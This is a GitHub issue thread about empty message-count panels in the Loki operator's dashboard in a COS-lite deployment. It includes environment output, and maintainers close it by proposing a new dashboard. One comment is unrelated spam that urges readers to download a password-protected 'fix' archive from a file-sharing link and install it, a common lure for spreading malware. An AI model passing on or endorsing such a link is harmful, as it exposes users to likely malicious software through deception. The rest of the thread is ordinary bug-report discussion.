### ISSUE TITLE
"Message Total" and "Messages Input" panels are still empty out of the box

### ISSUE THREAD

**Issue by nobuto-m** [canonical/loki-k8s-operator#444]
### Bug Description

Similar topic with https://github.com/canonical/loki-k8s-operator/issues/435 but the issue as per the subject is still visible with latest/edge.

I think the main problem here is `juju_application` is filtered as `loki` out of the box so it doesn't include message count from granfana-agent in other machines.

### To Reproduce

1. deploy cos-lite
2. deploy a machine charm and relate it with grafana-agent to forward logs

### Environment

```
App           Version  Status  Scale  Charm             Channel      Rev  Address         Exposed  Message
alertmanager  0.27.0   active      1  alertmanager-k8s  latest/edge  131  10.152.183.117  no       
catalogue              active      1  catalogue-k8s     latest/edge   59  10.152.183.100  no       
grafana       9.5.3    active      1  grafana-k8s       latest/edge  118  10.152.183.166  no       
loki          2.9.6    active      1  loki-k8s          latest/edge  163  10.152.183.188  no       
prometheus    2.52.0   active      1  prometheus-k8s    latest/edge  211  10.152.183.219  no       
traefik       2.11.0   active      1  traefik-k8s       latest/edge  203  10.152.183.184  no       Serving at 192.168.151.81
```

### Relevant log output

```shell
N/A
```

### dashboard

![image](https://github.com/user-attachments/assets/0975f1a4-4ff1-4754-9bb1-38fc9eca7ef5)

### out of the box

![image](https://github.com/user-attachments/assets/83db71fd-24c5-46fa-b64c-fdff7a61dede)

### more raw data

![image](https://github.com/user-attachments/assets/a692d3f5-6be5-4051-a1de-c9285468047a)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sed-i** [comment]
Hi @nobuto-m 
Would you be able to review the screenshots by @lucabello of the new dashboard we propose in #457?

**Comment by lucabello** [comment]
I'll assume that's the case, but please reopen the issue if anything's wrong!
